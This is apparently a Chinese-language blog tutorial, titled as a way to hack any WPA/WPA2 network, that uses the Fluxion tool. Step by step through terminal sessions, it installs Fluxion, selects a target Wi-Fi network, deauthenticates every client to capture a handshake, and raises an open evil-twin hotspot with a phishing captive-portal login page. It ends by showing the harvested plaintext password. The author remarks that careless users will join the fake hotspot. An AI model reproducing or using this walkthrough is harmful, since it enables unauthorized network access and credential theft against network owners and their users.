Hacking any WPA/WPA2 PSK without
2019-02-02 本文已影响31人
yangc随想
Fluxion is based on the programs such as aircrack-ng, mdk3, hostapd etc.
实验所需文件
准备条件
下载下来之后
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $ls
add.py airmon arch-install fluxion Installer.sh LICENSE logos.zip README.md remove.py
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $chmod 777 *
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $apt-get update
┌─[✗]─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $sudo proxychains ./Installer.sh
等待安装完成,完成标志,再次运行Installer.sh,结果如下
#########################################################
# #
# FLUXION 2 < Fluxion Is The Future > #
# by Deltax, Strasharo and ApatheticEuphoria #
# #
#########################################################
Aircrack-ng.....OK!
Aireplay-ng.....OK!
Airodump-ng.....OK!
Bully...........OK!
Curl............OK!
Dhcpd...........OK!
Hostapd.........OK!
Iwconfig........OK!
Lighttpd........OK!
Macchanger......OK!
Mdk3............OK!
Nmap............OK!
Openssl.........OK!
Php-cgi........OK!
Pyrit...........OK!
Python..........OK!
Reaver..........OK!
rfkill..........OK!
Unzip...........OK!
Xterm...........OK!
Zenity..........OK!
strings..........OK!
fuser............OK!
./fluxion
实战
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] Select your language
[1] English
[2] German
[3] Romanian
[4] Turkish
[5] Spanish
[6] Chinese
[7] Italian
[8] Czech
[9] Greek
[deltaxflux@fluxion]-[~]
这样即是运行成功,这里以English举例
[i] Select channel
[1] All channels
[2] Specific channel(s)
[3] Back
[deltaxflux@fluxion]-[~]1
选择1
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
WIFI LIST
ID MAC CHAN SECU PWR ESSID
......
[37] 90:94:xx:xx:xx:xx 11 WPA2 65% theKingOfNight
......
(*) Active clients
Select target. For rescan type r
选择37
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = theKingOfNight / WPA2
Channel = 11
Speed = 30 Mbps
BSSID = 90:94:97:xx:xx:xx ( )
[i] Select Attack Option
[1] FakeAP - Hostapd (Recommended)
[2] FakeAP - airbase-ng (Slower connection)
[3] WPS-SLAUGHTER - Bruteforce WPS Pin
[4] Bruteforce - (Handshake is required)
[5] Back
选择1
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = theKingOfNight / WPA2
Channel = 11
Speed = 30 Mbps
BSSID = 90:94:97:xx:xx:xx ( )
handshake location (Example: /home/thekingofnight/Desktop/test/test.cap)
Press ENTER to skip
Path:
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] Handshake check
[1] aircrack-ng (Miss chance)
[2] pyrit
[3] Back
[deltaxflux@fluxion]-[~]1
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] *Capture Handshake*
[1] Deauth all
[2] Deauth all [mdk3]
[3] Deauth target
[4] Rescan networks
[5] Exit
[deltaxflux@fluxion]-[~]1
使所有用户断开wifi,然后默认设备会自动重连wifi,也就给我们一个握手包。
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] *Capture Handshake*
Status handshake:
[1] Check handshake
[2] Back (Select another deauth method)
[3] Select another network
[4] Exit
#> 1
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = theKingOfNight / WPA2
Channel = 11
Speed = 30 Mbps
BSSID = 90:94:97:xx:xx:xx ( )
[i] Select your option
[1] Web Interface
[2] Bruteforce
[3] Exit
#?1
[i] Select Login Page
[1] English [ENG] (NEUTRA)
[2] German [GER] (NEUTRA)
[3] Russian [RUS] (NEUTRA)
[4] Italian [IT] (NEUTRA)
[5] Spanish [ESP] (NEUTRA)
[6] Portuguese [POR] (NEUTRA)
[7] Chinese [CN] (NEUTRA)
[8] French [FR] (NEUTRA)
[9] Turkish [TR] (NEUTRA)
[10] Romanian [RO] (NEUTRA)
[11] Hungarian [HU] (NEUTRA)
[12] Arabic [ARA] (NEUTRA)
[13] Greek [GR] (NEUTRA)
[14] Czech [CZ] (NEUTRA)
[15] Norwegian [NO] (NEUTRA)
[16] Bulgarian [BG] (NEUTRA)
[17] Serbia [SRB] (NEUTRA)
[18] Polish [PL] (NEUTRA)
[19] Indonesia [ID] (NEUTRA)
[20] Dutch [NL] (NEUTRA)
[21] Danish [DAN] (NEUTRA)
[22] Hebrew [HE] (NEUTRA)
[23] Thailand [TH] (NEUTRA)
[24] Belkin [ENG]
[25] Netgear [ENG]
[26] Huawei [ENG]
[27] Verizon [ENG]
[28] Netgear [ESP]
[29] Arris [ESP]
[30] Vodafone [ESP]
[31] TP-Link [ENG]
[32] TP-Link [ITA]
[33] Back
#? 7
现在会出来一个名称一样的,开放的wifi热点,之前加密的已经连接不上了。
image.png
安全意识不高的人们会默认连接名称相同的开放热点
此时,链接上网络的设备使用浏览器或者app默认会跳转到如下界面
image.png
输入完成后,页面跳转为
image.png
手机端也类似
image.png
最后
┌─[root@parrot]─[/home/thekingofnight/Desktop/test/test]
└──╼ #cat /root/theKingOfNight-password.txt
FLUX 0.23 by deltax
SSID: theKingOfNight
BSSID: 90:94:xx:xx:xx:xx ()
Channel: 11
Security: WPA2
Time: 00:15:16
Password: 1234567890
一些坑
恢复网络的解决方法
┌─[✗]─[root@parrot]─[/home/thekingofnight]
└──╼ #ifconfig wlan0mon down
┌─[root@parrot]─[/home/thekingofnight]
└──╼ #iwconfig wlan0mon channel 11
┌─[root@parrot]─[/home/thekingofnight]
└──╼ #service network-manager start
Fluxion无法监听的解决方法
airmon-ng check kill
airmon-ng start wlan0
参考
https://www.youtube.com/watch?v=gwF2mcbmfKQ&list=PLjo33Hih06ps2dlJMflCU7tYA7dzk_xYl&index=29
